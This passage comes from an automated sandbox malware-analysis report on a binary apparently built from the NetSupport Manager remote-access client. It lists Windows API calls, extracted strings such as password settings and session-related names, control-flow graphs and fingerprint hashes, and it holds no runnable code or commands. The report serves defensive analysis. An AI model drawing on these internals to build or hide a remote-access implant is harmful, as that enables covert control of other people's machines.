                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                  • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                  • API String ID: 703120326-1497550179
                                                                                  • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                  • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                  • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                  • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                  • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                  • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                    • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                    • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                    • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                    • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                  • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                  • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                  • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                    • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                    • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                  • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                    • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                    • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                    • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                  • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                  • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                  • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                  • API String ID: 3930710499-403456261
                                                                                  • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                  • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                  • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                  • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2938 11138c30-11138c47 2939 11139072-11139081 call 11161d01 2938->2939 2940 11138c4d-11138c54 2938->2940 2940->2939 2941 11138c5a-11138c61 2940->2941 2941->2939 2943 11138c67-11138c6e 2941->2943 2943->2939 2945 11138c74-11138c7b 2943->2945 2945->2939 2946 11138c81-11138c91 call 111450a0 2945->2946 2949 11138c93-11138c9a 2946->2949 2950 11138ca0-11138ce7 call 1105dd10 call 110637c0 2946->2950 2949->2939 2949->2950 2955 11138cf5-11138d1e call 1112c920 2950->2955 2956 11138ce9-11138cf0 2950->2956 2959 11138d24-11138d27 2955->2959 2960 11138dda call 110ea430 2955->2960 2956->2955 2961 11138d35 2959->2961 2962 11138d29-11138d2e 2959->2962 2966 11138ddf-11138de1 2960->2966 2965 11138d3b-11138d46 2961->2965 2962->2961 2964 11138d30-11138d33 2962->2964 2964->2965 2967 11138d48 2965->2967 2968 11138d4d-11138d65 2965->2968 2969 11138de3-11138dfe call 1105dd10 2966->2969 2970 11138e00-11138e0f PostMessageA 2966->2970 2967->2968 2980 11138dc1-11138dc8 2968->2980 2981 11138d67-11138d6d 2968->2981 2969->2970 2971 11138e15-11138e1a 2969->2971 2970->2971 2973 11138e25-11138e29 2971->2973 2974 11138e1c-11138e20 call 1110f270 2971->2974 2978 11138e2b-11138e33 2973->2978 2979 11138e4d-11138e76 call 11130410 call 11146ec0 call 1112cb20 call 111618c1 2973->2979 2974->2973 2984 11138e35-11138e4b 2978->2984 2985 11138e79-11138e81 2978->2985 2979->2985 2982 11138dd7 2980->2982 2983 11138dca-11138dd1 call 11131a80 2980->2983 2987 11138d6f-11138d74 2981->2987 2988 11138dbc 2981->2988 2982->2960 2983->2982 3001 11138dd3 2983->3001 2984->2985 2989 11138e83-11138e9d call 111618c1 call 11161d01 2985->2989 2990 11138e9e-11138ec4 call 11142e80 call 11146ee0 SetWindowTextA 2985->2990 2987->2988 2993 11138d76-11138d7b 2987->2993 2988->2980 3014 11138ed0-11138ee9 call 111618c1 * 2 2990->3014 3015 11138ec6-11138ecd call 111352b0 2990->3015 2993->2988 2999 11138d7d-11138d9f 2993->2999 2999->2988 3011 11138da1-11138db0 call 11145b40 2999->3011 3001->2982 3020 11138db2-11138dba 3011->3020 3025 11138eeb-11138eef 3014->3025 3026 11138f2e-11138f32 3014->3026 3015->3014 3020->2988 3020->3020 3027 11138f03-11138f0a 3025->3027 3028 11138ef1-11138f01 call 111352b0 3025->3028 3029 11138f38-11138f3a 3026->3029 3030 11138ffc-11138ffe 3026->3030 3036 11138f24 3027->3036 3037 11138f0c-11138f21 call 11131210 3027->3037 3028->3027 3028->3037 3031 11138f5c-11138f69 call 110f8640 3029->3031 3032 11138f3c-11138f3e 3029->3032 3034 11139000-11139002 3030->3034 3035 1113901d-1113902a call 110f8640 3030->3035 3052 1113906f-11139071 3031->3052 3054 11138f6f-11138f80 IsWindowVisible 3031->3054 3032->3031 3038 11138f40-11138f50 call 111352b0 3032->3038 3043 11139013-1113901a call 11131210 3034->3043 3044 11139004-1113900e call 111352b0 3034->3044 3035->3052 3053 1113902c-1113903c IsWindowVisible 3035->3053 3036->3026 3037->3036 3038->3031 3057 11138f52-11138f59 call 11131210 3038->3057 3043->3035 3044->3043 3052->2939 3053->3052 3058 1113903e-11139049 IsWindowVisible 3053->3058 3054->3052 3059 11138f86-11138f96 call 111450a0 3054->3059 3057->3031 3058->3052 3061 1113904b-1113906d EnableWindow call 11131210 EnableWindow 3058->3061 3059->3052 3067 11138f9c-11138fb4 GetForegroundWindow IsWindowVisible 3059->3067 3061->3052 3068 11138fc1-11138fcd call 11131210 3067->3068 3069 11138fb6-11138fbf EnableWindow 3067->3069 3072 11138fcf-11138fd5 3068->3072 3073 11138fde-11138ffb EnableWindow call 11161d01 3068->3073 3069->3068 3072->3073 3074 11138fd7-11138fd8 SetForegroundWindow 3072->3074 3074->3073
                                                                                  APIs
                                                                                    • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
                                                                                    • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                    • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                    • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                  • PostMessageA.USER32(00020492,000006CF,00000007,00000000), ref: 11138E0F
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • SetWindowTextA.USER32(00020492,00000000), ref: 11138EB7
                                                                                  • IsWindowVisible.USER32(00020492), ref: 11138F7C
                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                  • IsWindowVisible.USER32(00020492), ref: 11138FAA
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                  • EnableWindow.USER32(00020492,00000001), ref: 11138FE7
                                                                                  • IsWindowVisible.USER32(00020492), ref: 11139038
                                                                                  • IsWindowVisible.USER32(00020492), ref: 11139045
                                                                                  • EnableWindow.USER32(00020492,00000000), ref: 11139059
                                                                                  • EnableWindow.USER32(00020492,00000000), ref: 11138FBF
                                                                                    • Part of subcall function 11131210: ShowWindow.USER32(00020492,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                  • EnableWindow.USER32(00020492,00000001), ref: 1113906D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                  • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                  • API String ID: 3453649892-3803836183
                                                                                  • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                  • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                  • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                  • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                    • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                  • wsprintfA.USER32 ref: 11028214
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                  • wsprintfA.USER32 ref: 11028291
                                                                                  • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                  • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                  • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                  • API String ID: 512045693-419896573
                                                                                  • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                  • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                  • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                  • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(PCIINV.DLL,AD96CFBE,02F68BC0,02F68BB0,?,00000000,1118276C,000000FF,?,11031942,02F68BC0,00000000,?,?,?), ref: 11085E45
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                  • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                  • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                  • wsprintfA.USER32 ref: 11085F1B
                                                                                  • wsprintfA.USER32 ref: 11085F32
                                                                                  • wsprintfA.USER32 ref: 11085F49
                                                                                  • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                    • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,02F68BC0,00000000,?,?,?), ref: 11085A98
                                                                                    • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,02F68BC0,00000000,?,?,?), ref: 11085AAB
                                                                                    • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,02F68BC0,00000000,?,?,?), ref: 11085ABE
                                                                                    • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7591F550,?,?,110860C0,?,11031942,02F68BC0,00000000,?,?,?), ref: 11085AD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                  • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                  • API String ID: 4263811268-2492245516
                                                                                  • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                  • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                  • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                  • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                  APIs
                                                                                  • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                  • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                  • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                  • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                  • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                  • API String ID: 2061479752-1320826866
                                                                                  • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                  • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                  • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                  • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                  APIs
                                                                                  • __set_flsgetvalue.MSVCR100(6D031DE0,00000008,6D031E16,00000001,?), ref: 6D031D6A
                                                                                    • Part of subcall function 6D030341: TlsGetValue.KERNEL32(?,6D030713), ref: 6D03034A
                                                                                  • TlsGetValue.KERNEL32(6D031DE0,00000008,6D031E16,00000001,?), ref: 6D031D7B
                                                                                  • _calloc_crt.MSVCR100(00000001,00000214), ref: 6D031D8E
                                                                                  • DecodePointer.KERNEL32(00000000), ref: 6D031DAC
                                                                                  • _initptd.MSVCR100(00000000,00000000), ref: 6D031DBE
                                                                                    • Part of subcall function 6D031E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6D031F38,00000008,6D0575E9,00000000,00000000), ref: 6D031EAC
                                                                                    • Part of subcall function 6D031E9B: _lock.MSVCR100(0000000D), ref: 6D031EE0
                                                                                    • Part of subcall function 6D031E9B: InterlockedIncrement.KERNEL32(?), ref: 6D031EED
                                                                                    • Part of subcall function 6D031E9B: _lock.MSVCR100(0000000C), ref: 6D031F01
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6D031DC5
                                                                                  • __freeptd.LIBCMT ref: 6D032971
                                                                                  • __heap_init.LIBCMT ref: 6D03B8B1
                                                                                  • GetCommandLineA.KERNEL32(6D031DE0,00000008,6D031E16,00000001,?), ref: 6D03B8E2
                                                                                  • GetCommandLineW.KERNEL32 ref: 6D03B8ED
                                                                                  • __ioterm.LIBCMT ref: 6D047B7E
                                                                                  • free.MSVCR100(00000000), ref: 6D057485
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3890464582.000000006D021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6D020000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3890446633.000000006D020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890532245.000000006D0D4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890550927.000000006D0D6000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890580013.000000006D0D9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6d020000_bild.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                                                                  • String ID: x6
                                                                                  • API String ID: 2121586863-2935165365
                                                                                  • Opcode ID: 3420823ab969641053c3acaabe141679cf230d11372f794e9dae8c555e0ea27c
                                                                                  • Instruction ID: b6c00e8224b58d6d9e2ddb5cf5917459961bdbece1a85f7c87ac082ec22c7140
                                                                                  • Opcode Fuzzy Hash: 3420823ab969641053c3acaabe141679cf230d11372f794e9dae8c555e0ea27c
                                                                                  • Instruction Fuzzy Hash: 8031B430C5DA23EAFB162BB98944B2D36F4EF8B359B638426DE50C7040DF71C4409AA7
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 1110612E
                                                                                  • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                  • GetTickCount.KERNEL32 ref: 1110613D
                                                                                  • GetTickCount.KERNEL32 ref: 11106190
                                                                                  • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                  • GetTickCount.KERNEL32 ref: 111061CA
                                                                                  • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                  • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                  • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
